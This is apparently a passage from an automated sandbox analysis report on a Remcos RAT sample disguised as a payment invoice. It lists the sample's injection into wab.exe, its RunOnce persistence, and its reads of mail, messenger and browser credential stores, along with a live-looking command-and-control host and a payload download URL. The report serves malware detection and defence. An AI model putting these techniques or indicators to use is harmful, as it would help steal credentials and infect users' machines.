              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00416555 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_6F1D1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,3_2_6F1D1B63
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Temp\Dendrobe\Filamenterne.exeJump to dropped file
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeFile created: C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dllJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce DominionistJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce DominionistJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce DominionistJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce DominionistJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_004047C6
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5116Thread sleep count: 3596 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7100Thread sleep count: 70 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7100Thread sleep time: -35000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6752Thread sleep count: 5338 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6752Thread sleep time: -16014000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 3596 delay: -5Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3596Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5338Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1724Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.7 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00418981 memset,GetSystemInfo,9_2_00418981
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_0040672B FindFirstFileW,FindClose,3_2_0040672B
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405AFA
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_356310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_356310F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_35636580 FindFirstFileExA,7_2_35636580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeAPI call chain: ExitProcess graph end nodegraph_3-4598
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeAPI call chain: ExitProcess graph end nodegraph_3-4753
              Source: wab.exe, 00000007.00000002.45052676027.0000000004C6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
              Source: wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.45052911947.0000000004C97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_356360E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_356360E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_6F1D1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,3_2_6F1D1B63
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_3563724E GetProcessHeap,7_2_3563724E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_35634AB4 mov eax, dword ptr fs:[00000030h]7_2_35634AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_356360E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_356360E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_35632B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_35632B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_35632639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_35632639

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeSection loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Program Files (x86)\Windows Mail\wab.exe protection: read writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3000000Jump to behavior
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2F18008Jump to behavior
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ixfofJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\szlggikjoJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\utqzgbudcvrnJump to behavior
              Source: wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.45052911947.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager}|
              Source: wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*
              Source: wab.exe, 00000007.00000002.45053053148.0000000004CBB000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40215942945.0000000004CAC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40255442769.0000000004CBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2023/10/31 13:19:59 Program Manager]
              Source: wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager<|T
              Source: wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerL
              Source: wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: wab.exe, 00000007.00000002.45052911947.0000000004C97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerI
              Source: wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager*|B
              Source: wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.45052911947.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2023/10/31 13:20:06 Program Manager]
              Source: wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerk|
              Source: wab.exe, 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exeBinary or memory string: [2023/10/31 13:20:06 Program Manager]
              Source: wab.exeBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 00000007.00000002.45052676027.0000000004C7A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40526012940.0000000004CA9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.45052911947.0000000004C97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerur|
              Source: wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*t|
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_35632933 cpuid 7_2_35632933
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_35632264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_35632264
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034A5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00408043 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,10_2_00408043

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1392, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword10_2_004033E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword10_2_00402DA5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword10_2_00402DA5
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6416, type: MEMORYSTR
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1392, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts11
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium1
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default Accounts2
              Command and Scripting Interpreter              		1
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		Exfiltration Over Bluetooth1
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)212
              Process Injection              		1
              DLL Side-Loading              		2
              Credentials in Registry              		2
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		Automated Exfiltration1
              Non-Standard Port              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)1
              Registry Run Keys / Startup Folder              		1
              Masquerading              		1
              Credentials In Files              		28
              System Information Discovery              		Distributed Component Object Model11
              Input Capture              		Scheduled Transfer2
              Non-Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
              Virtualization/Sandbox Evasion              		LSA Secrets31
              Security Software Discovery              		SSH11
              Clipboard Data              		Data Transfer Size Limits112
              Application Layer Protocol              		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Access Token Manipulation              		Cached Domain Credentials2
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items212
              Process Injection              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Application Window Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1334833 Sample: 18001787_down_payment_invoi... Startdate: 31/10/2023 Architecture: WINDOWS Score: 100 30 ourt2949aslumes9.duckdns.org 2->30 32 gudanidevelopment.ge 2->32 34 geoplugin.net 2->34 48 Snort IDS alert for network traffic 2->48 50 Multi AV Scanner detection for domain / URL 2->50 52 Antivirus detection for URL or domain 2->52 54 8 other signatures 2->54 8 18001787_down_payment_invoice_90002104.exe 2 53 2->8         started        signatures3 process4 file5 24 C:\Users\user\AppData\Local\...\System.dll, PE32 8->24 dropped 56 Writes to foreign memory regions 8->56 58 Maps a DLL or memory area into another process 8->58 12 wab.exe 4 17 8->12         started        signatures6 process7 dnsIp8 36 94.156.6.253, 2402, 50077, 50078 NET1-ASBG Bulgaria 12->36 38 gudanidevelopment.ge 217.147.225.69, 50076, 80 GRENA-ASTbilisiGeorgiaGE Georgia 12->38 40 geoplugin.net 178.237.33.50, 50079, 80 ATOM86-ASATOM86NL Netherlands 12->40 26 C:\Users\user\AppData\Roaming\paqlgkfs.dat, data 12->26 dropped 28 C:\Users\user\AppData\...\Filamenterne.exe, PE32 12->28 dropped 60 Maps a DLL or memory area into another process 12->60 62 Installs a global keyboard hook 12->62 17 wab.exe 1 12->17         started        20 wab.exe 1 12->20         started        22 wab.exe 2 12->22         started        file9 signatures10 process11 signatures12 42 Tries to steal Instant Messenger accounts or passwords 17->42 44 Tries to harvest and steal browser information (history, passwords, etc) 17->44 46 Tries to steal Mail credentials (via file / registry access) 20->46

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              18001787_down_payment_invoice_90002104.exe11%VirustotalBrowse
              18001787_down_payment_invoice_90002104.exe0%ReversingLabs

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Dendrobe\Filamenterne.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll3%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              gudanidevelopment.ge18%VirustotalBrowse
              geoplugin.net0%VirustotalBrowse
              ourt2949aslumes9.duckdns.org13%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://odc.offi0%Avira URL Cloudsafe
              https://www.adobe.0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/ads-programmable0%Avira URL Cloudsafe
              https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
              http://gudanidevelopment.ge/IogvoayYhe139.binSchoSvltathirchimie.com/IogvoayYhe139.bin100%Avira URL Cloudmalware
              https://csp.withgoogle.com/csp/ads-programmable0%VirustotalBrowse
              https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b70%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingaotak0%VirustotalBrowse
              https://deff.nelreports.net/api/report?cat=msn0%VirustotalBrowse
              https://csp.withgoogle.com/csp/botguard-scs0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl0%Avira URL Cloudsafe
              https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b70%VirustotalBrowse
              http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl00%Avira URL Cloudsafe
              https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl0%VirustotalBrowse
              https://btloader.com/tag?o=6208086025961472&upapi=true0%Avira URL Cloudsafe
              http://www.imvu.comata0%Avira URL Cloudsafe
              https://contextual.med0%Avira URL Cloudsafe
              https://btloader.com/tag?o=6208086025961472&upapi=true0%VirustotalBrowse
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%20%Avira URL Cloudsafe
              http://ocsp.sca1b.amazontrust.com060%Avira URL Cloudsafe
              https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo0%VirustotalBrowse
              https://csp.withgoogle.com/csp/botguard-scs0%VirustotalBrowse
              https://pki.goog/repository/00%VirustotalBrowse
              https://aefd.nelreports.net/api/report?cat=bingrms0%VirustotalBrowse
              http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl00%VirustotalBrowse
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%20%VirustotalBrowse
              https://pki.goog/repository/00%Avira URL Cloudsafe
              http://crl.rootg2.amazontrust.com/rootg2.crl00%Avira URL Cloudsafe
              https://tpc.g0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
              https://2542116.fls.doublecli0%Avira URL Cloudsafe
              https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat0%Avira URL Cloudsafe
              http://crl.rootg2.amazontrust.com/rootg2.crl00%VirustotalBrowse
              http://crl.pki.goog/gsr1/gsr1.crl0;0%Avira URL Cloudsafe
              http://ocsp.sectigo.com00%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/botguard-scs0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
              http://crl.pki.goog/gsr1/gsr1.crl0;0%VirustotalBrowse
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl00%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingth0%VirustotalBrowse
              http://pki.goog/repo/certs/gts1c3.der070%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/adspam-signals-scs0%Avira URL Cloudsafe
              https://2542116.fls.double0%Avira URL Cloudsafe
              https://sb.scorecardresearch.com/beacon.js0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/adspam-signals-scs0%VirustotalBrowse
              https://csp.withgoogle.com/csp/report-to/botguard-scs0%VirustotalBrowse
              https://aefd.nelreports.net/api/report?cat=wsb0%Avira URL Cloudsafe
